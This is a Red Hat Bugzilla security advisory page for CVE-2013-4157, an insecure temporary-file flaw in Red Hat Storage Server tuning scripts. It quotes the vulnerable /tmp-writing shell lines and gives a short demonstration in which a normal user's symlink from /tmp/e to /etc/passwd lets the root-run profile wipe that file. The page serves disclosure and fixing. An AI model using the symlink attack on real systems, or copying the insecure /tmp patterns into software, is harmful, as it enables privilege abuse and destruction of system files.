Bug 986516 - (CVE-2013-4157) CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-server /tmp file creation vuln
CVE-2013-4157 Red Hat Storage Server 2.0: appliance-base / redhat-storage-ser...
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
unspecified
All Linux
low Severity low
: ---
: ---
Assigned To: Red Hat Product Security
impact=low,public=20130904,reported=2...
: Security
Depends On: 986517 986518
Blocks: 986520
  Show dependency treegraph
 
Reported: 2013-07-20 00:52 EDT by Kurt Seifried
Modified: 2014-09-08 02:47 EDT (History)
10 users (show)

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2013-09-04 14:48:25 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Kurt Seifried 2013-07-20 00:52:15 EDT
Gowrishankar Rajaiyan (grajaiya@redhat.com) reports:

I found a potential security issue with 
redhat-storage-server-1.7.3-2.el6rhs.noarch previously known as 
appliance-base-1.7.3-1.el6rhs while verifying 
https://bugzilla.redhat.com/show_bug.cgi?id=910566. [Open URL] This issue also 
exists in the latest released version of RHS 
https://rhn.redhat.com/rhn/software/channel/downloads/Download.do?cid=14689 [Open URL]

Description: As part of /etc/tune-profiles/rhs-high-throughput/ktune.sh 
and /etc/tune-profiles/rhs-virtualization/ktune.sh
<snip>
for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
</snip>


A file "e" is created in /tmp directory. This information is public at 
https://bugzilla.redhat.com/show_bug.cgi?id=910566#c13 [Open URL] (I set it to 
private now, not sure if that helps). So any normal user can create a 
softlink from /tmp/e to /etc/passwd. The tuned profiles are executed as 
root user, hence, exposes a security loop hole where in a normal user 
can wipe out /etc/passwd.

Please guide on how to proceed from here.


A demonstration is as follows:
As normal user:
[shanks@localhost ~]$ id
uid=500(shanks) gid=500(shanks) groups=500(shanks)
[shanks@localhost ~]$ cd /tmp/

[shanks@localhost tmp]$ ln -s /etc/passwd e
[shanks@localhost tmp]$ ls -l
total 4
lrwxrwxrwx 1 shanks shanks 11 Jul 19 12:49 e -> /etc/passwd
-rwx------. 1 root root 391 Jul 19 09:04 ks-script-QuMjt3
-rwxr-xr-x. 1 root root 0 Jul 19 09:04 ks-script-QuMjt3.log
-rw------- 1 root root 0 Jul 19 09:04 tmp.ta4401DZd7
-rw-------. 1 root root 0 Jul 19 08:54 yum.log
[shanks@localhost tmp]$

As root:
[root@localhost ~]# tuned-adm profile rhs-high-throughput
Reverting to saved sysctl settings: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh stop': setting readahead to 128 on 
brick devices:
[ OK ]
Reverting to cfq elevator: dm-0 dm-1 [ OK ]
Stopping tuned: [ OK ]
Switching to profile 'rhs-high-throughput'
Applying ktune sysctl settings:
/etc/ktune.d/tunedadm.conf: [ OK ]
Calling '/etc/ktune.d/tunedadm.sh start': setting readahead to 65536 on 
brick devices:
[ OK ]
Applying sysctl settings from /etc/sysctl.conf
Applying deadline elevator: dm-0 dm-1 [ OK ]
Starting tuned: 'import site' failed; use -v for traceback
[ OK ]
[root@localhost ~]# cat /etc/passwd
[root@localhost ~]#
Comment 3 Kurt Seifried 2013-07-20 01:30:57 EDT
Also there appear to be more vulnerabilities:

/etc/tune-profiles/rhs-virtualization/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-virtualization/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-virtualization/ktune.sh:          done) 2>> /tmp/bricks.err
/etc/tune-profiles/rhs-virtualization/ktune.sh:          echo '* hard nofile 16384' ) > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        grep -v 'soft nofile' $limits_conf | grep -v 'hard nofile' > /tmp/limits.conf
/etc/tune-profiles/rhs-virtualization/ktune.sh:        mv /tmp/limits.conf $limits_conf
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  bricklist='/tmp/local-bricks.list'
/etc/tune-profiles/rhs-high-throughput/ktune.sh:  for d in `find /var/lib/glusterd/vols -name bricks -type d 2>/tmp/e ` ; do
/etc/tune-profiles/rhs-high-throughput/ktune.sh:          done) 2>> /tmp/bricks.err
Comment 4 Murray McAllister 2013-09-04 07:34:45 EDT
Acknowledgements:

These issues were discovered by Gowrishankar Rajaiyan of Red Hat and Kurt Seifried of the Red Hat Security Response Team.
Comment 5 errata-xmlrpc 2013-09-04 14:10:55 EDT
This issue has been addressed in following products:

  Red Hat Storage 2.0

Via RHSA-2013:1205 https://rhn.redhat.com/errata/RHSA-2013-1205.html

Note You need to log in before you can comment on or make changes to this bug.